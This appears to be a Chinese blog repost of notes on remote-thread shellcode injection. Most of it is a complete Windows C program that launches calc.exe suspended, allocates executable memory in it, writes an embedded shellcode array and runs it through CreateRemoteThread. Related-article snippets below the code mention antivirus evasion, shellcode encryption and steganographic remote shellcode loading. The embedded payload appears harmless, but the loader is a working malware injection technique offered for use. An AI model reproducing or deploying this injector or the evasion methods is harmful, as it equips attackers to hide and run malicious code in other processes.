远程线程注入shellcode笔记

最新推荐文章于 2023-09-11 14:00:00 发布
最新推荐文章于 2023-09-11 14:00:00 发布
阅读量316 收藏 1
点赞数
原文链接:http://www.cnblogs.com/killbit/p/5971446.html
版权

 

 

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>

char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
		"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
		"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
		"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
		"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
		"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
		"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
		"\x49\x0b\x31\xc0\x51\x50\xff\xd7";


BOOL injection()
{
	wchar_t Cappname[MAX_PATH] = {0};
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpMalwareBaseAddr;
	LPVOID lpnewVictimBaseAddr;
	HANDLE hThread;
	DWORD dwExitCode;
	BOOL bRet = FALSE;

	lpMalwareBaseAddr = shellcode;

	//获取计算器的地址,接下来将启动一个计算器
	GetSystemDirectory(Cappname,MAX_PATH);
	_tcscat(Cappname,L"\\calc.exe");
	printf("Injection program Name:%S\r\n",Cappname);

	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi,sizeof(pi));

	//创建计算器
	if (CreateProcess(Cappname,NULL,NULL,NULL,
		FALSE,CREATE_SUSPENDED
		,NULL,NULL,&si,&pi) == 0)
	{
		return bRet;
	}

	//开辟内存空间大小
	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	if (lpnewVictimBaseAddr == NULL)
	{
		return bRet;
	}

	//将SHELLCODE写入
	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);

	//创建线程
	hThread = CreateRemoteThread(pi.hProcess,0,0,
		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);

	//等待结束进程
	WaitForSingleObject(pi.hThread,INFINITE);
	GetExitCodeProcess(pi.hProcess,&dwExitCode);
	TerminateProcess(pi.hProcess,0);
	return bRet;
}

void help(char* proc)
{
	printf("%s:[-] start a process and injection shellcode to memory\r\n",proc);
}

int main(int argc,char* argv[])
{
	help(argv[0]);
	injection();
}

 

 

转载于:https://www.cnblogs.com/killbit/p/5971446.html

weixin_30872789
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
笔记ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 464
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
windows-CODE注入远程线程注入
天使也掉毛
08-14 5985
远程线程注入
远程线程shellcode注入
ndl1302732的专栏
10-11 2248
高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~          前一篇文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。           今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址...
一文读懂远程线程注入
最新发布
Karka_的博客
09-11 333
在红队行动中,红队的目的都是要在不暴露自身行动的前提下,向蓝队发动攻击。他们使用各种技术和程序来隐藏C2连接和数据流。攻击活动的第一步是获得初始访问权。他们会使用定制的恶意软件和有效载荷来躲避防杀软和EDR等防御工具。本文涉及知识点实操练习:[DLL注入型病毒实验](https://www.hetianlab.com/expc.do?wemedia)(通过实验了解DLL注入型病毒的攻击过程)进程注入是用来逃避防御机制的重要技术之一。
ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2213
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
ShellCode编写和远程代码注入
&Ψ的博客
09-15 1291
文章目录1.ShellCode是什么2.ShellCode的编写原则3.TEB与PEB1)TEB线程信息获取当前线程的TEB2)PEB进程环境块获取当前进程的TEBPEB_LDR_DATALDR_DATA_TABLE_ENTRY在任意进程中找到一个LDR_DATA_TABLE_ENTRY1.一些结构体的定义2.寻找方法4.ShellCode的实现思路5.远程注入代码6.关于我在vs2017编写时遇到的问题解决方法 1.ShellCode是什么 一段特殊的代码,不依赖与任何进程环境。简单来讲就是一段可以在Wi
易语言远程线程注入方法
01-04
易语言远程线程注入方法是一种在程序运行时将一段代码注入到另一个正在运行的进程中的技术。这种方法在软件开发、调试、性能优化以及恶意软件中都有应用。在易语言中,实现远程线程注入需要对操作系统底层机制和...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
双击第三个输入框即可生成shellcode,这里默认的shellcode远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行shellcode 这里说明一下哈,这里是...
利用图片隐写术来远程动态加载shellcode1
08-03
1. 最开头的两个十六进制为 42H,4DH 转为 ASCII 后分别表示 BM,所有的 BMP 文件都以这 2. 红色箭头是图片的大小(这里对应的十六进制为
内核线程注入x64
11-22
内核线程注入是一种高级的系统编程技术,主要用于在操作系统内核层面对进程进行操作,例如注入DLL(动态链接库)或执行特定的ShellCode。本文将深入探讨在64位Windows 7环境下,如何利用驱动程序实现内核线程注入。 ...
远程线程注入的例子(最近学习资料)
07-12
最近学习了几个远程线程注入的程序的编写,整理了一下,上传共学习交流。这个只是其中之一,其他见我的资源列表(关于线程注入和进程隐藏的例子都已经上传)。
java远程线程注入_学习:远程线程实现DLL注入shellcode注入以及OD调试原理
weixin_36286567的博客
02-17 520
远程线程:#include#include//函数地址:00C31740int main() {HANDLE hThread;HANDLE hProcess;// 1、得到要在其进程中创建线程的进程句柄hProcess = OpenProcess(PROCESS_ALL_ACCESS,false,10940);if (hProcess == NULL) {OutputDebugString("Op...
C++进程注入
神棍之路
08-25 7万+
// C++Injector.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 1674
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
利用注入进程shellcode实现程序自删除
bulerain的专栏
06-06 3042
某些情况下需要exe运行结束删除自身,而自删除程序有好几种方法,如下面的两方法:a.先使自己快速退出,然后再在命令行中删除自己;或是先使自己快速退出,然后再在bat文件或脚本文件中删除自己b. 非常经典的,关闭硬编码为4的句柄,撤销自己在内存的映射,再删除自己,再结束自己,也就是进程在未真正退出的时候就已经被删除了(只能在win2k或98使用)                    int mai
windows核心编程第三章学习事件内核对象代码
zhaoshan313的专栏
06-04 691
本文是看书时调试
Windows线程注入——弹窗ShellCode
sandikast的专栏
01-16 2101
进行程序线程注入的代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错! #include #include #include typedef struct _THREAD_PARA { FARPROC pFunc[2]; }THREAD_PARAM, *PTHREAD_PARAM; BY
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
配合隐写术远程动态加载 shellcode1
08-03
"该资源主要讨论如何利用隐写术配合BMP图片远程动态加载shellcode,提高隐蔽性和免杀性。通过将shellcode拆分成字节并嵌入到BMP图片的像素alpha通道中,然后上传到可信网站,通过特定偏移拼接执行。文章提到了BMP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值